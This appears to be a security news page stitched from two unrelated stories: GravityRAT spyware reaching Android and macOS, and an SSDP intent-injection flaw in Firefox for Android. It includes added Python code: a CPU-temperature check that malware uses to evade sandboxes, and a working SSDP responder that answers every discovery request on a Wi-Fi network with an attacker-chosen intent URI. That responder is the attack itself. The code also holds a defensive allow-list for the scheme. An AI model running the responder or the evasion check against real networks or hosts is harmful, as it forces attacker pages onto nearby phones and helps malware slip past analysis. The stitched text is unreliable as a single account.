GravityRAT now also affects mobile devices

GravityRAT is a malware strain known for checking the CPU temperature of Windows computers to avoid being executed in sandboxes and virtual machines: most hypervisors expose no thermal sensor at all, so an empty or failing temperature query is taken as a sign that the host is not a real victim machine.
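What that check looks like in practice, as an added example that is not GravityRAT's own code: it assumes the temperature is read through the WMI class MSAcpi_ThermalZoneTemperature via the `wmic` command (the usual source on Windows, and an assumption here since the page does not name the method), parses the readings, and treats the absence of any plausible reading as "virtualised". The same parser lets a sandbox operator confirm whether their VM exposes thermal data. The sample outputs are constructed.

```python
"""CPU-temperature sandbox check in the style attributed to GravityRAT above.

Added example, not GravityRAT's code. Assumes (not stated on the page) that the
temperature comes from the WMI class MSAcpi_ThermalZoneTemperature, queried with
the `wmic` tool; hypervisors rarely expose a thermal zone, so the query returns
nothing there.
"""
import subprocess
import sys


def kelvin_tenths_to_celsius(value: int) -> float:
    # WMI reports CurrentTemperature in tenths of a Kelvin.
    return value / 10.0 - 273.15


def parse_wmic_temperatures(output: str) -> list[float]:
    """Parse `wmic ... get CurrentTemperature` output into Celsius readings.

    Returns an empty list when no thermal zone was reported, which is the
    signal the malware interprets as "sandbox or VM".
    """
    temps = []
    for line in output.splitlines():
        token = line.strip()
        if token.isdigit():                # data rows are bare integers
            temps.append(kelvin_tenths_to_celsius(int(token)))
    return temps


def looks_like_physical_host(temps: list[float]) -> bool:
    """Physical machines report at least one plausible reading; VMs usually none.

    The 0..120 C bounds are a heuristic chosen for this example.
    """
    return any(0.0 < t < 120.0 for t in temps)


def query_thermal_zones() -> str:
    """Run the WMI query on Windows; elsewhere return '' so the logic behaves like a VM."""
    if sys.platform != "win32":
        return ""
    try:
        completed = subprocess.run(
            ["wmic", "/namespace:\\\\root\\wmi", "path",
             "MSAcpi_ThermalZoneTemperature", "get", "CurrentTemperature"],
            capture_output=True, text=True, timeout=15,
        )
        return completed.stdout
    except (OSError, subprocess.SubprocessError):
        return ""


# Constructed sample outputs for offline use.
SAMPLE_PHYSICAL = "CurrentTemperature\r\n3032\r\n3102\r\n\r\n"   # about 30 C and 37 C
SAMPLE_VM = "No Instance(s) Available.\r\n"


if __name__ == "__main__":
    readings = parse_wmic_temperatures(query_thermal_zones())
    print("thermal readings (C):", [round(t, 1) for t in readings])
    print("looks like physical host:", looks_like_physical_host(readings))
```

On a Linux or macOS analysis box the script reports "looks like physical host: False" by construction, which is exactly the verdict a Windows sandbox without a thermal zone would produce.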

The GravityRAT Remote Access Trojan (RAT) is believed to be the work of Pakistani hacker groups and has been under development since at least 2015.

Malware researchers found a new Android GravityRAT sample in 2019. The attackers had added a spy module to Travel Mate, an Android app for travelers to India whose source code is available on GitHub.

The tainted app can steal contacts, emails, and documents from the infected device and send them back to the command-and-control (C&C) server. The same C&C server was also associated with two other malicious apps, targeting the Windows and macOS platforms.

The spyware collects information about the system and supports multiple features, including:

  • search for files on the computer and on removable disks with the extensions .doc, .docx, .ppt, .pptx, .xls, .xlsx, .pdf, .odt, .odp, and .ods, and upload them to the server
  • get a list of running processes
  • intercept keystrokes
  • take screenshots
  • execute arbitrary shell commands
  • scan ports

The malware was distributed via applications that clone legitimate apps and act as downloaders for the GravityRAT payloads.

The applications analyzed by Kaspersky were developed in .NET, Python and the Electron framework; they achieve persistence by adding a scheduled task.

Threat actors tricked victims into installing a malicious app disguised as a secure messenger, ostensibly to continue a conversation, and the app then infected the device.

What is peculiar about this GravityRAT campaign is that it no longer infects only Windows: it now targets Android and macOS devices too.

Hijacking Firefox

The SSDP engine of the victims' Firefox for Android browser, which Firefox uses to discover casting devices on the local network, can be tricked into triggering an Android intent: the attacker simply replaces the LOCATION of the device-description XML file in the SSDP response packets with a specially crafted value pointing to an Android intent URI.

To exploit this, an attacker connected to the targeted Wi-Fi network runs a malicious SSDP server on their own device and triggers intent-based commands on nearby Android devices through Firefox, without requiring any interaction from the victims.

The activities permitted by the intent include automatically launching the browser and opening any attacker-defined URL, which, according to the researcher, is sufficient to trick victims into providing their credentials, installing malicious apps, and other malicious outcomes depending on the surrounding scenario.
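The exchange described above, as an added example that is not Moberly's proof of concept: it shows the M-SEARCH a discovery client multicasts, the 200 OK a responder answers with, the LOCATION swap that carries an intent: URI instead of an http:// device-description URL, and the scheme check a discovery client should apply before acting on LOCATION. The M-SEARCH datagram, the intent URI, the search target (ST) and the USN are constructed for the example; the responder function is only for testing against devices on a lab network you control.

```python
"""SSDP discovery exchange behind the Firefox-for-Android intent injection.

Added example, not the original researcher's code. The sample M-SEARCH, the
intent URI, the ST and the USN are constructed; nothing here is taken from a
real device.
"""
import socket
import struct
from urllib.parse import urlsplit

SSDP_GROUP = "239.255.255.250"
SSDP_PORT = 1900

# Constructed: the multicast search a casting-capable client sends on the LAN.
SAMPLE_MSEARCH = (
    "M-SEARCH * HTTP/1.1\r\n"
    "HOST: 239.255.255.250:1900\r\n"
    "MAN: \"ssdp:discover\"\r\n"
    "MX: 2\r\n"
    "ST: roku:ecp\r\n"
    "\r\n"
)

# A benign responder points LOCATION at its device-description XML over HTTP.
BENIGN_LOCATION = "http://192.168.1.20:8060/dial/dd.xml"
# The attack swaps in an Android intent URI (syntax: intent://host/path#Intent;key=value;...;end).
MALICIOUS_LOCATION = "intent://example.com/#Intent;scheme=https;end"


def parse_ssdp(datagram: str) -> tuple[str, dict[str, str]]:
    """Split an HTTPU datagram into its start line and lower-cased header map."""
    head = datagram.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def is_msearch(datagram: str) -> bool:
    start, headers = parse_ssdp(datagram)
    return start.startswith("M-SEARCH") and headers.get("man") == '"ssdp:discover"'


def build_response(location: str, st: str) -> str:
    """The unicast 200 OK an SSDP responder returns; only LOCATION differs between benign and hostile."""
    return (
        "HTTP/1.1 200 OK\r\n"
        "CACHE-CONTROL: max-age=1800\r\n"
        "EXT:\r\n"
        f"LOCATION: {location}\r\n"
        "SERVER: Example/1.0 UPnP/1.1 Example/1.0\r\n"
        f"ST: {st}\r\n"
        f"USN: uuid:00000000-0000-0000-0000-000000000000::{st}\r\n"
        "\r\n"
    )


def location_is_acceptable(location: str) -> bool:
    """The client-side check whose absence made the attack work: LOCATION must be an http(s) URL with a host."""
    parts = urlsplit(location)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


def run_responder(location: str, iface_ip: str = "0.0.0.0") -> None:
    """Join the SSDP group and answer every M-SEARCH with `location` (lab use only; never returns)."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("", SSDP_PORT))
    mreq = struct.pack("4s4s", socket.inet_aton(SSDP_GROUP), socket.inet_aton(iface_ip))
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
    while True:
        data, peer = sock.recvfrom(65535)
        text = data.decode("utf-8", errors="replace")
        if not is_msearch(text):
            continue
        _, headers = parse_ssdp(text)
        sock.sendto(build_response(location, headers.get("st", "ssdp:all")).encode(), peer)


if __name__ == "__main__":
    _, req = parse_ssdp(SAMPLE_MSEARCH)
    for loc in (BENIGN_LOCATION, MALICIOUS_LOCATION):
        _, resp = parse_ssdp(build_response(loc, req["st"]))
        print(f"LOCATION={resp['location']!r} acceptable={location_is_acceptable(resp['location'])}")
```

The scheme check is deliberately allow-list based: rejecting only `intent:` would leave every other app-handled scheme open, whereas a discovery client has no reason to fetch a device description from anything but http(s).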

“The target simply has to have the Firefox application running on their phone. They do not need to access any malicious websites or click any malicious links. No attacker-in-the-middle or malicious app installation is required. They can simply be sipping coffee while on a cafe’s Wi-Fi, and their device will start launching application URIs under the attacker’s control,” Moberly said.

“It could have been used in a way similar to phishing attacks where a malicious site is forced onto the target without their knowledge in the hopes they would enter some sensitive info or agree to install a malicious application.”

Moberly reported the vulnerability to the Firefox team a few weeks earlier, and Mozilla has since patched it in Firefox for Android versions 80 and later.